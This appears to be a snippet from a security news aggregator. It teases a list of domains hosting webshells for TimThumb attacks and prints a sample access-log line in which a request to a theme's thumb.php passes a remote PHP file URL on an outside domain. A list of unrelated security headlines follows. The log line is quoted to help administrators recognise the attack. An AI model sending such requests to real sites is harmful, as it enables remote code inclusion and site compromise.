List of domains hosting webshells for Timthumb attacks...that might be vulnerable to it. If you like to look at your logs, that’s how it would look like: 18.104.22.168 – – [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1″ 404 9347... more…
- Skype answers 2012’s call, makes group video calls free
- Editorial survey: What are the roles of IT and infosec in the enterprise?
- Serious Vulnerability in Microsoft Remote Desktop
- Security researcher’s hack caused airplane to climb, FBI asserts
- A10 Loadbalancer Software Upgrade – Oct 25
- Containerized Security: The Next Evolution of Virtualization?
- CISPA sponsor compares opponents to 14-year-olds
- UK Spy Agency Warns of State-sponsored Hackers Targeting Critical Infrastructure
- China says US OPM breach ‘criminal’, not state-funded attack
- Third-Party App Stores Delivered via the iOS App Store